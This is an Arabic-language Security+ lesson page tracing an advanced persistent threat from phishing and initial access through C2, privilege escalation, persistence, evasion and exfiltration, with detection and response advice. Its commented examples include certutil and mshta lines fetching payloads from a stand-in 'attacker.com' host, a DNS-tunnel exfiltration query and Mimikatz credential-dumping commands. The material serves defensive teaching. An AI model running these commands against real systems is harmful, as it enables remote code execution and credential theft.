دورة حياة APT: من الوصول الأولي إلى الاستمرارية
تابعوا هجوم APT بدءًا من الوصول الأولي عبر التصيّد الموجّه، مرورًا بإنشاء C2 وتصعيد الامتيازات، ووصولًا إلى آليات الاستمرارية التي تصمد أمام إعادة التشغيل وإعادة إنشاء الصور.
دورة حياة APT: من الوصول الأولي إلى الاستمرارية درس مجاني في Security+ Academy على CoddyKit. هذا هو الدرس 1 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Security+ Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Security+ Academy 4 دروس في المجموع.
ما هو التهديد المستمر المتقدم؟
إن التهديد المستمر المتقدم (APT) حملة هجوم إلكتروني متطورة وطويلة الأمد، تنفذها عادة جهات تابعة لدول أو مجموعات إجرامية ذات تمويل جيد، ولديها أهداف استراتيجية محددة. وتتمثل الخصائص الثلاث المحددة له في ما يلي: متقدم — يستخدم برمجيات خبيثة مخصصة وثغرات يوم الصفر وتقنيات مبتكرة؛ مستمر — يحافظ على وجود خفي لأشهر أو سنوات، وليس عملية سريعة هدفها الدخول والخروج؛ تهديد — هجوم منسق وموجه ضد مؤسسة محددة. ومن مجموعات APT الشهيرة APT28 (Fancy Bear) المرتبطة بـ GRU الروسية، وAPT41 المرتبطة بالصين، وLazarus Group المرتبطة بكوريا الشمالية.
الوصول الأولي: كيف تتسلل مجموعات APT
تبدأ حملات APT عادة بواحدة من مجموعة صغيرة من تقنيات الوصول الأولي المجربة. وتُعد التصيد الموجّه باستخدام مرفقات مسلحة أو روابط لسرقة بيانات الاعتماد الأسلوب الأكثر شيوعًا؛ إذ تبدو الرسالة الإلكترونية وكأنها واردة من زميل أو شريك موثوق. ويؤدي اختراق سلسلة التوريد (كما في SolarWinds/SUNBURST) إلى إدراج شيفرة خبيثة في تحديثات برمجية موثوقة. كما تُستغل الخدمات المواجهة للإنترنت (مثل أجهزة VPN وخوادم Exchange وتطبيقات الويب) باستخدام CVE غير المُرقّعة. أما هجمات حفرة الري فتخترق مواقع إلكترونية يكثر موظفو المؤسسة المستهدفة من زيارتها، وتقدم عمليات استغلال أثناء التصفح للزوار.
التنفيذ: تشغيل الحمولة الأولى
بعد الحصول على الوصول الأولي، يجب على المهاجم تنفيذ حمولته الأولى على النظام المستهدف. تفضل مجموعات APT التقنيات التي تختلط بنشاط النظام المعتاد، ومنها: وحدات الماكرو الخبيثة في مستندات Office، التي تُنفذ عند تمكين الضحية للمحتوى؛ وملفات HTML Application (HTA) التي تُنفذ البرامج النصية عند فتحها؛ والملفات الثنائية الأصلية للنظام (LOLBins)، أي استخدام أدوات Windows المشروعة مثل mshta.exe وcertutil.exe وregsvr32.exe أو wscript.exe لتنفيذ شيفرة المهاجم وتجاوز قوائم السماح بالتطبيقات. وتجعل هذه التقنيات من الصعب تمييز الحمولات الأولى عن نشاط النظام المشروع.
# Example LOLBin abuse: certutil used to download payload
# certutil.exe -urlcache -split -f http://attacker.com/payload.exe payload.exe
# Example: mshta executing remote HTA
# mshta.exe http://attacker.com/malicious.hta
# Detection: alert on certutil/mshta with network connectionsإنشاء C2: الاتصال بالجهة المهاجمة
بعد تشغيل الحمولة الأولى، تنشئ قناة الأوامر والتحكم (C2) عائدة إلى البنية التحتية للمهاجم. ويستخدم C2 الحديث لدى مجموعات APT تقنيات مصممة لتفادي الاكتشاف، منها: HTTPS إلى نطاقات شبيهة تحاكي خدمات سحابية مشروعة مثل Teams وOneDrive وGitHub؛ ونفق DNS، أي ترميز الأوامر في استعلامات سجلات TXT الخاصة بـ DNS بحيث تبدو كحركة DNS عادية؛ وخوارزميات توليد النطاقات (DGAs) التي تنشئ نطاق C2 جديدًا كل يوم انطلاقًا من قيمة أولية، ما يجعل حظر النطاقات غير فعال؛ وC2 قائم على استغلال الأدوات الأصلية للنظام باستخدام منصات سحابية مشروعة مثل Slack API وGoogle Sheets وTwitter بوصفها قناة اتصال.
# DNS tunneling detection: look for unusually long DNS queries
# Normal DNS query: www.google.com (13 chars)
# DNS tunnel query: 4f72d3a1b9c2e5f8.exfil.attacker.com (38 chars of encoded data)
# Zeek/Bro detection rule concept:
# alert dns (dns.qname length > 50)الاستطلاع: رسم خريطة للبيئة
بعد إنشاء C2، ينفذ مشغلو APT استطلاعًا داخليًا لفهم البيئة قبل التقدم أكثر. ويشمل ذلك: حصر Active Directory باستخدام أدوات مثل BloodHound لرسم علاقات الثقة وتحديد الأهداف عالية القيمة؛ وفحص الشبكة لتحديد المضيفات النشطة والخدمات والمنافذ المفتوحة؛ واكتشاف بيانات الاعتماد من خلال البحث في أنظمة الملفات عن ملفات الإعداد وقواعد بيانات كلمات المرور أو بيانات الاعتماد المخزنة في المتصفحات؛ وحصر الهويات لتحديد الحسابات ذات الامتيازات وحسابات الخدمات ومحطات عمل المسؤولين. وتستخدم معظم أنشطة الاستطلاع أدوات Windows الأصلية (net user /domain وipconfig وnltest) لتجنب الاكتشاف.
# Native Windows commands used by APTs for discovery
# net user /domain # list domain users
# net group 'Domain Admins' /domain # list domain admins
# ipconfig /all # network configuration
# netstat -ano # active network connections
# tasklist /v # running processesتصعيد الامتيازات: الحصول على صلاحيات المسؤول
تحصل مجموعات APT عادة على الوصول الأولي باستخدام بيانات اعتماد مستخدم محدودة، ثم يتعين عليها تصعيد الامتيازات لتحقيق أهدافها. وتشمل مسارات التصعيد الشائعة: سرقة بيانات الاعتماد من الذاكرة باستخدام Mimikatz (استخراج تجزئات NTLM من ذاكرة عملية LSASS)؛ وKerberoasting (طلب تذاكر خدمة لحسابات الخدمات وكسرها دون اتصال)؛ واستغلال الخدمات ذات الإعدادات الخاطئة التي تتضمن أذونات ضعيفة (مثل مسارات الملفات الثنائية غير الآمنة للخدمات واختطاف DLL)؛ وانتحال الرموز لسرقة رمز المصادقة الخاص بعملية ذات امتيازات. وتتيح تقنيات تجاوز User Account Control (UAC) الانتقال من مسؤول عادي إلى SYSTEM من دون إظهار مطالبة UAC.
# Mimikatz: dump credentials from LSASS memory
# (defender perspective - what attackers run)
# privilege::debug
# sekurlsa::logonpasswords
# Detection: alert on LSASS memory reads by non-system processes
# Windows Event ID 4656/4663: access to LSASS processآليات الاستمرارية: البقاء بعد إعادة التشغيل
تستثمر مجموعات APT بكثافة في آليات الاستمرارية التي تصمد أمام إعادة التشغيل وإعادة إنشاء الصور، لأن الحصول على الوصول الأولي ربما كان صعبًا ومكلفًا. وتشمل تقنيات الاستمرارية الشائعة في Windows: مفاتيح Registry Run (HKLM\Software\Microsoft\Windows\CurrentVersion\Run)؛ والمهام المجدولة التي تنفذ البرمجيات الخبيثة وفق جدول منتظم؛ وخدمات Windows التي تبدأ تلقائيًا؛ واشتراكات أحداث WMI (يصعب اكتشافها وتصمد أمام معظم جهود التنظيف)؛ واختطاف ترتيب البحث عن DLL؛ وبرمجيات الإقلاع/ما قبل نظام التشغيل (برمجيات مزروعة في البرامج الثابتة لـ UEFI وتصمد أمام إعادة تثبيت نظام التشغيل، وقد استخدمها ممثلو Equation Group المرتبطون بـ NSA).
# Common persistence locations to monitor
# Registry:
# HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# HKLM\System\CurrentControlSet\Services
# Check scheduled tasks for suspicious entries
# schtasks /query /fo LIST /v | findstr 'Task Name\|Run As User\|Task To Run'التملص من الدفاعات: الاختباء على مرأى من الجميع
تستخدم APTs التملص من الدفاعات على نطاق واسع لتجنب اكتشافها بواسطة أدوات أمان نقاط النهاية والمحللين. وتشمل الأساليب: حقن العمليات — حقن تعليمات برمجية خبيثة في عمليات شرعية مثل explorer.exe أو svchost.exe لكي تعمل البرمجية الخبيثة تحت اسم عملية موثوق بها؛ تغيير الطوابع الزمنية — تعديل الطوابع الزمنية للملفات لجعل الملفات الخبيثة تبدو وكأنها موجودة منذ سنوات؛ حذف السجلات والتلاعب بها — مسح سجلات أحداث Windows لإزالة الأدلة؛ إساءة استخدام شهادات توقيع التعليمات البرمجية — توقيع البرمجيات الخبيثة باستخدام شهادات شرعية مسروقة؛ والتنفيذ داخل الذاكرة (البرمجيات الخبيثة عديمة الملفات)، الذي لا يكتب شيئًا على القرص حيث يمكن لبرامج مكافحة الفيروسات المعتمدة على الملفات اكتشافه.
الاستخراج: سرقة البيانات خفية
تدير APTs استخراج البيانات بعناية لتجنب تشغيل ضوابط DLP وأنظمة اكتشاف حالات الشذوذ في عرض النطاق الترددي. وتشمل الأساليب: تجهيز البيانات — جمع البيانات المستهدفة في أرشيف مشفر قبل استخراجها على دفعات صغيرة على مدار أيام؛ استخراج البيانات عبر HTTPS إلى خدمات التخزين السحابية (OneDrive وDropbox) المسموح بها وفق قواعد جدار الحماية المؤسسي؛ الإخفاء المعلوماتي — إخفاء البيانات داخل ملفات الصور؛ والاستخراج المعتمد على الوقت أثناء ساعات العمل للاندماج مع حركة المرور المشروعة. تستخرج APTs ما تحتاج إليه فقط (الملكية الفكرية عالية القيمة وبيانات الاعتماد والخطط الاستراتيجية) بدلًا من نسخ كل شيء بكميات كبيرة — مما يقلل من بصمتها واحتمالية اكتشافها.
اكتشاف نشاط APT: المؤشرات الرئيسية
يتطلب اكتشاف APT البحث بما يتجاوز التنبيهات الفردية لتحديد أنماط النشاط المرتبط عبر سلسلة الهجوم. وتشمل المؤشرات الرئيسية: علاقات غير معتادة بين العمليات الأصلية والفرعية (مثل قيام Word بتشغيل PowerShell)؛ أوامر PowerShell المشفرة أو التنزيلات من الإنترنت؛ إنشاء مهام مجدولة أو خدمات في أوقات غير معتادة؛ وصول عمليات غير تابعة للنظام إلى ذاكرة LSASS؛ الحركة الجانبية عبر SMB أو WMI من محطات العمل؛ واستعلامات DNS صادرة غير معتادة ذات أطوال طويلة للنطاقات الفرعية. يتيح MITRE ATT&CK Navigator للمدافعين ربط الأساليب المكتشفة بمصفوفة ATT&CK وتحديد الثغرات في تغطية الاكتشاف لديهم.
# Splunk query: detect PowerShell encoded command execution
# index=windows source=WinEventLog:Security EventCode=4688
# | search NewProcessName='*powershell*' CommandLine='*-enc*'
# | table _time, ComputerName, SubjectUserName, CommandLineالاستجابة لـ APT: الاحتواء دون تنبيه المهاجم
تتطلب الاستجابة لهجوم APT نشط تحقيق توازن دقيق: احتواء التهديد دون تنبيه المهاجم. فقد يؤدي الاحتواء المبكر (حظر حركة C2 وتعطيل الحسابات) إلى دفع APT لتفعيل حمولات مدمرة أو تسريع استخراج البيانات. وتشمل أفضل الممارسات: المراقبة خفية أثناء جمع المعلومات؛ تقسيم المضيفات المصابة تدريجيًا باستخدام قواعد جدار الحماية دون حظر C2؛ نشر تقنيات الخداع (رموز honeytokens وحسابات canary) لمراقبة نشاط المهاجم؛ والتنسيق مع جهات إنفاذ القانون قبل تنفيذ إجراءات الاحتواء الرئيسية. وتتطلب المعالجة الكاملة تحديد جميع آليات الاستمرارية والحسابات المخترقة — إذ إن غرسة واحدة لم يُعثر عليها تعني عودة المهاجم.
اختبار سريع
اختبر مدى فهمك لمفاهيم CompTIA Security+ (SY0-701) الواردة في هذا الدرس.
مراجعة الدرس
تعلمت في هذا الدرس أن: APT هي حملات متقدمة ومستمرة وموجهة تعمل عادةً لأشهر، وتستخدم التصيد الموجّه أو هجمات سلسلة التوريد أو استغلال الثغرات للوصول الأولي؛ وأن APTs تستخدم LOLBins والخدمات السحابية الشرعية لـ C2 للاندماج مع حركة المرور المعتادة وتجنب الاكتشاف؛ وأن آليات الاستمرارية تتراوح من مفاتيح تشغيل السجل إلى غرسات البرامج الثابتة UEFI — وتُعد اشتراكات WMI صعبة الاكتشاف والمعالجة بشكل خاص. بعد ذلك سنستكشف تقنيات الحركة الجانبية، بما في ذلك Pass-the-Hash وPass-the-Ticket.
الأسئلة الشائعة
هل درس «دورة حياة APT: من الوصول الأولي إلى الاستمرارية» مجاني؟
نعم — نص درس «دورة حياة APT: من الوصول الأولي إلى الاستمرارية» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Security+ Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Security+ Academy 4 دروس في المجموع.
ماذا ستتعلم في «دورة حياة APT: من الوصول الأولي إلى الاستمرارية»؟
تابعوا هجوم APT بدءًا من الوصول الأولي عبر التصيّد الموجّه، مرورًا بإنشاء C2 وتصعيد الامتيازات، ووصولًا إلى آليات الاستمرارية التي تصمد أمام إعادة التشغيل وإعادة إنشاء الصور. تتمرن على Security+ Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Security+ Academy؟
لا تُشترط خبرة سابقة. Security+ Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 1 من أصل 4.
كم من الوقت يستغرق درس «دورة حياة APT: من الوصول الأولي إلى الاستمرارية»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Security+ Academy هذا؟
نعم. كل درس في Security+ Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- دورة حياة APT: من الوصول الأولي إلى الاستمرارية
- الحركة الجانبية: Pass-the-Hash وPass-the-Ticket
- هجمات Kerberoasting وGolden Ticket
- إطار MITRE ATT&CK للكشف والاستجابة